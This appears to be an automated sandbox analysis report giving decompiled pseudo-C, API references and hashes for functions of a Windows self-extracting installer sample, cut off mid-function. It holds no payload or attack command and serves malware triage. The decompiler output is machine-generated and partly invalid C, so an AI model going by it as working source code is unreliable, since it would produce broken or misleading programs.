Opcode Fuzzy Hash: a98b1705347363888af400a425714f6f87186fe8cbb0cc67adae2b38774ed225
Instruction Fuzzy Hash: 90314F71E00119AFCF14CFB9DD889EEBBB5EB89310F154269F815B7240DA306D058B60

Uniqueness

Uniqueness Score: -1.00%

Function 00EB6298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00EB6298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0xeb8004; // 0x92ae1240
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E00EB171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0xeb9124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0xeba288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E00EB171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00EB6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x00eb6298
0x00eb62a0
0x00eb62a7
0x00eb62ad
0x00eb62af
0x00eb62bb
0x00eb62c3
0x00eb62c4
0x00eb633b
0x00eb633b
0x00eb6345
0x00eb634d
0x00000000
0x00000000
0x00eb62da
0x00eb62de
0x00eb635f
0x00eb6369
0x00eb62e0
0x00eb62e0
0x00eb62e0
0x00eb62e3
0x00eb62e5
0x00eb62e5
0x00eb62e8
0x00eb62e8
0x00eb62ea
0x00eb62eb
0x00eb62ef
0x00eb62f1
0x00eb62f3
0x00eb6302
0x00eb6308
0x00eb630d
0x00eb6314
0x00eb6314
0x00eb6316
0x00eb6319
0x00eb6355
0x00eb6357
0x00eb631b
0x00eb631b
0x00eb6331
0x00eb6334
0x00eb6339
0x00000000
0x00eb6339
0x00eb6319
0x00eb636b
0x00eb637d
0x00eb637d
0x00000000

APIs

Part of subcall function 00EB171E: _vsnprintf.MSVCRT ref: 00EB1750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00EB51CA,00000004,00000024,00EB2F71,?,00000002,00000000), ref: 00EB62CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00EB51CA,00000004,00000024,00EB2F71,?,00000002,00000000), ref: 00EB62D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00EB51CA,00000004,00000024,00EB2F71,?,00000002,00000000), ref: 00EB631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00EB6345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00EB51CA,00000004,00000024,00EB2F71,?,00000002,00000000), ref: 00EB6357

Strings

UPDFILE%lu, xrefs: 00EB62B3, 00EB6329

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 7c814b9145c89fffa183872f5aff3bd6bcdf9c46d6915155b1b67ce88760e250
Instruction ID: 3aad35579d282778f7e5823bb1eb10aa4126be8679246fa9c0031fce034fe456
Opcode Fuzzy Hash: 7c814b9145c89fffa183872f5aff3bd6bcdf9c46d6915155b1b67ce88760e250
Instruction Fuzzy Hash: 6B21F675A00219AFDB10AFA5DC459FFBBB8EF84714F041229F902B3251DB399D068BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00EB3A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EB3A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E00EB468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0xeb8d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E00EB468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0xeb8d4c, "<None>") == 0) {
							LocalFree( *0xeb8d4c);
							L9:
							 *0xeb9124 = 0;
							return 1;
						}
						_t9 = E00EB6517(_t19, 0x7d1, 0, E00EB3100, 0, 0);
						LocalFree( *0xeb8d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0xeb9124 = 0x800704c7;
						L2:
						return 0;
					}
					E00EB44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0xeb8d4c);
					 *0xeb9124 = 0x80070714;
					goto L2;
				}
				E00EB44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xeb9124 = E00EB6285();
				goto L2;
			}

0x00eb3a46
0x00eb3a57
0x00eb3a5d
0x00eb3a63
0x00eb3a6a
0x00eb3a91
0x00eb3a9a
0x00eb3ad8
0x00eb3b13
0x00eb3b19
0x00eb3b1b
0x00000000
0x00eb3b21
0x00eb3ae7
0x00eb3af4
0x00eb3afc
0x00000000
0x00000000
0x00eb3afe
0x00eb3a87
0x00000000
0x00eb3a87
0x00eb3aa8
0x00eb3ab3
0x00eb3ab9
0x00000000
0x00eb3ab9
0x00eb3a78
0x00eb3a82
0x00000000

APIs

Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46A0
Part of subcall function 00EB468F: SizeofResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46A9
Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46C3
Part of subcall function 00EB468F: LoadResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46CC
Part of subcall function 00EB468F: LockResource.KERNEL32(00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46D3
Part of subcall function 00EB468F: memcpy_s.MSVCRT ref: 00EB46E5
Part of subcall function 00EB468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00EB2F64,?,00000002,00000000), ref: 00EB3A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00EB3AB3

Part of subcall function 00EB44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
Part of subcall function 00EB44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554

Part of subcall function 00EB6285: GetLastError.KERNEL32(00EB5BBC), ref: 00EB6285

lstrcmpA.KERNEL32(<None>,00000000), ref: 00EB3AD0
LocalFree.KERNEL32 ref: 00EB3B13

Part of subcall function 00EB6517: FindResourceA.KERNEL32(00EB0000,000007D6,00000005), ref: 00EB652A
Part of subcall function 00EB6517: LoadResource.KERNEL32(00EB0000,00000000,?,?,00EB2EE8,00000000,00EB19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00EB6538
Part of subcall function 00EB6517: DialogBoxIndirectParamA.USER32(00EB0000,00000000,00000547,00EB19E0,00000000), ref: 00EB6557
Part of subcall function 00EB6517: FreeResource.KERNEL32(00000000,?,?,00EB2EE8,00000000,00EB19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00EB6560

LocalFree.KERNEL32(00000000,00EB3100,00000000,00000000), ref: 00EB3AF4

Strings

LICENSE, xrefs: 00EB3A46
<None>, xrefs: 00EB3AC5

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 8284d99e71a97803e3c3b2f3f53aff3beb9e3d32215b0f90433abcc95f3015a6
Instruction ID: 6948eedc610550f6264932913c8e943015b760ab2e41e84f3eb168288ba29aea
Opcode Fuzzy Hash: 8284d99e71a97803e3c3b2f3f53aff3beb9e3d32215b0f90433abcc95f3015a6
Instruction Fuzzy Hash: B811B170201201AFD721AF37AD0AE973AFDDFD5710F14663EB641F62F2DA7988049661

Uniqueness

Uniqueness Score: -1.00%

Function 00EB24E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00EB24E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0xeb8004; // 0x92ae1240
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E00EB658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00EB6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x00eb24e0
0x00eb24eb
0x00eb24f2
0x00eb24f7
0x00eb2504
0x00eb250e
0x00eb251d
0x00eb252c
0x00eb2541
0x00eb2546
0x00eb2553
0x00eb2555
0x00eb2555
0x00eb2546
0x00eb256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00EB2506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00EB252C
_lopen.KERNEL32 ref: 00EB253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 00EB254C
_lclose.KERNEL32(00000000), ref: 00EB2555

Strings

wininit.ini, xrefs: 00EB2510

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: ef12714cb904d6c9f140a97d329f86e3722a86f794a0e8bc99d804e575a1a362
Instruction ID: 6b3c6c18ee6b1e52a006d5f8b317db88082c9c6b880c7c15c655290e201d3917
Opcode Fuzzy Hash: ef12714cb904d6c9f140a97d329f86e3722a86f794a0e8bc99d804e575a1a362
Instruction Fuzzy Hash: DC01B5326011186BCB20AB6A9C0CEDFBBBCDF45760F040265FA49F3190DF748E49CA91

Uniqueness

Uniqueness Score: -1.00%

Function 00EB36EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00EB36EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0xeb8004; // 0x92ae1240
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0xeb8184 = 1;
						 *0xeb8180 = 1;
						L13:
						 *0xeb9a40 = _t119;
						L14:
						__eflags =  *0xeb8a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00EB2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00EB2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0xeb8a38 & 0x00000001;
											if(( *0xeb8a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("lenta");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E00EB681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E00EB67C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E00EB28E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0xeb9a40 = _t119;
						 *0xeb8184 = 1;
						 *0xeb8180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0xeb9a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0xeb8184 = _t135;
							 *0xeb8180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E00EB44B9(0, _t138);
					L66:
					return E00EB6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x00eb36f9
0x00eb3700
0x00eb370c
0x00eb3716
0x00eb3718
0x00eb371b
0x00eb3721
0x00eb372b
0x00eb373d
0x00eb3745
0x00eb3746
0x00eb3746
0x00eb3749
0x00eb37ab
0x00eb37ad
0x00eb37ae
0x00eb37b3
0x00eb37b8
0x00eb37b8
0x00eb37bf
0x00eb37bf
0x00eb37c5
0x00000000
0x00000000
0x00eb37cb
0x00eb37cd
0x00000000
0x00000000
0x00eb37d5
0x00eb37db
0x00eb37e8
0x00eb37ea
0x00eb37ea
0x00eb37ea
0x00eb37f0
0x00eb37f6
0x00eb3805
0x00eb3817
0x00eb382b
0x00eb3830
0x00eb3836
0x00eb383b
0x00eb383d
0x00eb38eb
0x00eb38eb
0x00eb38f2
0x00eb390c
0x00eb3911
0x00eb3911
0x00eb3913
0x00eb394d
0x00eb394d
0x00eb394f
0x00eb38a9
0x00eb38a9
0x00eb38b0
0x00eb38b2
0x00eb38b9
0x00eb38bb
0x00eb38c1
0x00eb3975
0x00eb38c7
0x00eb38de
0x00eb38e0
0x00eb38e0
0x00eb397b
0x00eb397d
0x00eb39a9
0x00eb397f
0x00eb3982
0x00eb398b
0x00eb398d
0x00eb398f
0x00eb399f
0x00eb39a1
0x00eb3991
0x00eb3991
0x00eb3991
0x00eb398f
0x00eb39af
0x00eb39b6
0x00eb3a0f
0x00eb3a0f
0x00eb3a11
0x00eb3a13
0x00eb3a19
0x00000000
0x00eb39b8
0x00eb39b8
0x00eb39ba
0x00000000
0x00000000
0x00eb39bc
0x00eb39bf
0x00000000
0x00000000
0x00eb39c3
0x00eb39c9
0x00eb39ce
0x00eb39d0
0x00eb39e3
0x00eb39e5
0x00eb39e6
0x00eb39f1
0x00eb39f7
0x00eb39fa
0x00eb3a01
0x00eb3a04
0x00000000
0x00000000
0x00eb3a06
0x00eb3a09
0x00eb3a09
0x00eb3a0b
0x00eb3a0b
0x00000000
0x00eb3a09
0x00eb39fc
0x00000000
0x00eb39fc
0x00eb39d3
0x00eb39d8
0x00eb39da
0x00000000
0x00000000
0x00000000
0x00eb39dc
0x00eb39b6
0x00eb3955
0x00eb395b
0x00000000
0x00000000
0x00eb3961
0x00eb3963
0x00000000
0x00000000
0x00eb3969
0x00eb3969
0x00000000
0x00eb3969
0x00eb3915
0x00eb3915
0x00eb391b
0x00eb391f
0x00000000
0x00000000
0x00eb392d
0x00eb3933
0x00eb3938
0x00eb393a
0x00000000
0x00000000
0x00eb3940
0x00eb3946
0x00eb394b
0x00000000
0x00eb394b
0x00000000
0x00eb38f2
0x00eb3843
0x00eb3845
0x00000000
0x00000000
0x00eb384b
0x00eb384d
0x00eb3883
0x00eb3885
0x00000000
0x00000000
0x00eb389a
0x00eb389e
0x00eb389e
0x00000000
0x00000000
0x00eb38a0
0x00eb38a0
0x00eb38a2
0x00000000
0x00000000
0x00eb38a4
0x00000000
0x00eb38a4
0x00eb384f
0x00eb3851
0x00eb3857
0x00eb386e
0x00eb3877
0x00eb387b
0x00000000
0x00000000
0x00000000
0x00eb3881
0x00eb3859
0x00eb385c
0x00eb3862
0x00eb3866
0x00000000
0x00000000
0x00eb3868
0x00000000
0x00eb38f4
0x00eb38f4
0x00eb38f5
0x00eb38fb
0x00eb3901
0x00eb3901
0x00000000
0x00eb390a
0x00eb374b
0x00eb374e
0x00eb375c
0x00eb3764
0x00eb3769
0x00eb376e
0x00eb3771
0x00eb379c
0x00eb379f
0x00000000
0x00000000
0x00eb37a3
0x00eb37a4
0x00000000
0x00eb37a4
0x00eb3773
0x00eb3777
0x00eb3778
0x00eb377f
0x00eb3781
0x00eb378e
0x00eb378e
0x00eb3794
0x00000000
0x00eb3794
0x00eb3783
0x00000000
0x00000000
0x00eb3785
0x00eb378c
0x00000000
0x00000000
0x00000000
0x00eb378c
0x00eb3750
0x00000000
0x00eb372d
0x00eb372d
0x00eb396b
0x00eb396b
0x00eb396c
0x00eb396e
0x00eb396f
0x00eb3a1e
0x00eb3a1e
0x00eb3a22
0x00eb3a27
0x00eb3a3e
0x00eb3a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00EB3723
MessageBeep.USER32(00000000), ref: 00EB39C3
MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 00EB39F1

Strings

lenta, xrefs: 00EB39E9, 00EB3A19
3, xrefs: 00EB3785

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$lenta
API String ID: 2519184315-4216304122
Opcode ID: 74ad77e9dca5c87349263de911e8db5412f5a8cf45ec84bb65fe6e3fece1b764
Instruction ID: 4993f34c471b4e747a10bcb732b14d5d226c9308be5a9bfbea8a2df49c512ca6
Opcode Fuzzy Hash: 74ad77e9dca5c87349263de911e8db5412f5a8cf45ec84bb65fe6e3fece1b764
Instruction Fuzzy Hash: AA910571A012249FDB358B39CD827EB77B4EB85308F1511AAD989B7291DB708F80CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00EB6517 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00EB6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0xeb9a3c; // 0xeb0000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E00EB44B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t5 =  &_a16; // 0xeb2ee8
					_t24 =  *_t5;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x00eb651f
0x00eb652a
0x00eb6534
0x00eb656b
0x00eb6577
0x00eb657c
0x00eb657c
0x00eb6536
0x00eb653e
0x00eb6542
0x00000000
0x00eb6544
0x00eb6547
0x00eb654c
0x00eb6549
0x00eb6549
0x00eb6549
0x00eb655e
0x00eb6560
0x00eb6569
0x00000000
0x00000000
0x00eb6569
0x00eb6542
0x00eb6587

APIs

FindResourceA.KERNEL32(00EB0000,000007D6,00000005), ref: 00EB652A
LoadResource.KERNEL32(00EB0000,00000000,?,?,00EB2EE8,00000000,00EB19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00EB6538
DialogBoxIndirectParamA.USER32(00EB0000,00000000,00000547,00EB19E0,00000000), ref: 00EB6557
FreeResource.KERNEL32(00000000,?,?,00EB2EE8,00000000,00EB19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00EB6560

Strings

., xrefs: 00EB657C

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID: .
API String ID: 1214682469-1603360339
Opcode ID: 95a7b3859e6171ee5dfe9f575c1a1b83534799ce8eb28727f6c589f3a2bbfadd
Instruction ID: 74ff904177e7f1977fc554f560db597cbb0f44b2c62819fc4b4dedafd846cdc1
Opcode Fuzzy Hash: 95a7b3859e6171ee5dfe9f575c1a1b83534799ce8eb28727f6c589f3a2bbfadd
Instruction Fuzzy Hash: AF012672101205BFCF206FAA9C48DFB7A6CEB85364F040625FE14B3194D775CC208AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EB6495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00EB6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
